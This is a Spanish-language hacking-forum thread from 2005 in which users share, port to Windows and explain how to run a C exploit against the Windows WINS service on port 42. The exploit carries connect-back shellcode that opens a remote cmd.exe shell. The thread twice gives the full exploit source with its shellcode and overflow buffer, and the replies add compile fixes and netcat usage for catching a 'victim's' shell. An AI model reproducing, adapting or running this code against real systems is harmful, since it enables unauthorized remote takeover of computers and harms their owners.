Quien puede compilar este exploit que me ayude porfavor =)

Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

Quien puede compilar este exploit que me ayude porfavor =)

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Quien puede compilar este exploit que me ayude porfavor =) (Leído 886 veces)

Nose

Desconectado

Mensajes: 17

Quien puede compilar este exploit que me ayude porfavor =)

« en: 28 Junio 2005, 02:57 »

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

   char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
"\x55\xe4";

char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"

"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02"
"\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05";
char rep[] =

"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00"
"\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4e\x05\x90\x00\x4e\x05";
void usage();

int main(int argc, char *argv[])
{
int i,sock,sock2,sock3,addr,len=16;
int rc;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4) usage();

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
   memcpy(mess3+le,rep,sizeof(rep)-1);
   le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode));
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
system("pause");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf("

Conectando a la victima\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc!=0)
{
printf("Puerto 42 cerrado, Objetivo no vulnerable.\n");
exit(-1);
}
printf("

Puerto 42 abierto. Enviando exploit\n");

send(sock,mess3,lenr,0);
printf("

Exploit enviado\n");

sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

void usage()
{
unsigned int a;
printf("\nUso: <Ip-Victima> <Tu Ip> <Tu Puerto a la escucha>\n");
printf("Ejemplo: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}


	En línea

parisnet

Desconectado

Mensajes: 61

Re: Quien puede compilar este exploit que me ayude porfavor =)

« Respuesta #1 en: 28 Junio 2005, 03:16 »

Me parece que no es para usar en windows. Va a ser dificil compilarlo y hacerlo andar en xp. Digo porque falta el include windows.h.


	En línea

www.parisnet.com.ar

P[i]

Desconectado

Mensajes: 472

Re: Quien puede compilar este exploit que me ayude porfavor =)

« Respuesta #2 en: 29 Junio 2005, 13:04 »

Solo tienes que cambiar las librerias.

aki va el codigo:

Código:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h> -> añade ademas de esto el link a ws2_32.lib o libws2_32.a segun compilador
#include <windows.h> -> asi añades muchas librerias por si acaso
//#include <sys/socket.h> -> es de linux borrala
#include <time.h>
//#include <netinet/in.h> -> es de linux borrala
//#include <curses.h> -> es de linux borrala
#include <unistd.h>
#include <errno.h>
//#include <netdb.h>-> es de linux borrala
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
//#include <sys/select.h> -> es de linux borrala
//#include <netinet/in.h>-> es de linux borrala
//#include <arpa/inet.h>-> es de linux borrala

char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
"\x55\xe4";

char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"

"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02"
"\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05";
char rep[] =

"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00"
"\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4e\x05\x90\x00\x4e\x05";
void usage();

int main(int argc, char *argv[])
{
int i,sock,sock2,sock3,addr,len=16;
int rc;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4) usage();

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode));
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
system("pause");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf("Conectando a la victima\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc!=0)
{
printf("Puerto 42 cerrado, Objetivo no vulnerable.\n");
exit(-1);
}
printf("Puerto 42 abierto. Enviando exploit\n");
send(sock,mess3,lenr,0);
printf("Exploit enviado\n");
//sleep(5); --> esta linea la dejas asi o buscas la libreria que contiene esta funcion.
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

void usage()
{
unsigned int a;
printf("\nUso: <Ip-Victima> <Tu Ip> <Tu Puerto a la escucha>\n");
printf("Ejemplo: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

Mira el comentario de la funcion sleep, y acuerdate de compilarlo como c++ y de ponerle el link a ws2_32 por eso de las socket. Man tarde 5 minutos para hacerla rular en windows. Yo uso win98se y ahi va.


« Última modificación: 29 Junio 2005, 13:06 por Pi »	En línea

Nose

Desconectado

Mensajes: 17

Re: Quien puede compilar este exploit que me ayude porfavor =)

« Respuesta #3 en: 29 Junio 2005, 14:59 »

Gracias viejo te pasaste por lka informacion este exploit sirve para windows 2000 sp4 cierto y si me podrias decir como usarlo te lo agradeceria gracias viejo cuidate...


	En línea

P[i]

Desconectado

Mensajes: 472

Re: Quien puede compilar este exploit que me ayude porfavor =)

« Respuesta #4 en: 29 Junio 2005, 15:35 »

man tienes que usar netcat, busca info por el foro, con el netcat dejas un puerto a la escucha cualkiera por ejemplo el 7777 y despues desde la linea de comandos haces esto

Código:

c:> exploit.exe 192.168.1.2 192.168.1.3 7777

siendo 192.168.1.2 la ip de tu victima y 192.168.1.3 tu ip.
Y listo si la vistima es vulnerable te devlovera la shell en el netcat.


	En línea

Nose

Desconectado

Mensajes: 17

Re: Quien puede compilar este exploit que me ayude porfavor =)

« Respuesta #5 en: 29 Junio 2005, 16:56 »

gracias viejo por la ayuda =)


	En línea

Nose

Desconectado

Mensajes: 17

Re: Quien puede compilar este exploit que me ayude porfavor =)

« Respuesta #6 en: 29 Junio 2005, 17:11 »

Disculpa que te moleste tanto la victima tiene que tener el puerto 42 abierto? que puerto es ese? o nose si tu me puedes ayudar lo que pasa es que busco un exploit que me funcione para win2000 con sp4 pero todavia no doy con niuno que me funcione =( bueno viejo espero me respondas cuidate


	En línea

eLank0

eLhAcKeR r00Lz

Desconectado

Mensajes: 937

Re: Quien puede compilar este exploit que me ayude porfavor =)

« Respuesta #7 en: 29 Junio 2005, 17:58 »

Citar

que puerto es ese?

http://support.microsoft.com/?scid=kb;es;150543&spid=3071&sid=346#kb2

El puerto TCP/42 es el puerto del servicio de Windows llamado WINS.

Por curiosidad, WINS es un servidor de nombres para NetBIOS. Seria el equivalente del DNS(para IP) pero en este caso para NetBIOS.

Salu2!


	En línea

Antes de Postear,

Nose

Desconectado

Mensajes: 17

Re: Quien puede compilar este exploit que me ayude porfavor =)

« Respuesta #8 en: 29 Junio 2005, 18:08 »

Gracias nose si alguno de ustedes tendra algun exploit para win98 para win200 sp4 para winxp sp2 que me pueda ayudar porfavor se han pasado por su ayuda adios


	En línea

mousehack

Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD

Re: Quien puede compilar este exploit que me ayude porfavor =)

« Respuesta #9 en: 29 Junio 2005, 20:42 »

pasate por este link y fijate si se encuentra lo q necesitas:

http://cyruxnet.org/winbug.php

salu2


	En línea

VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Me ayudais a compilar este programa de Go con mingw64? Programación C/C++	skan	2	248	11 Abril 2012, 16:58 por skan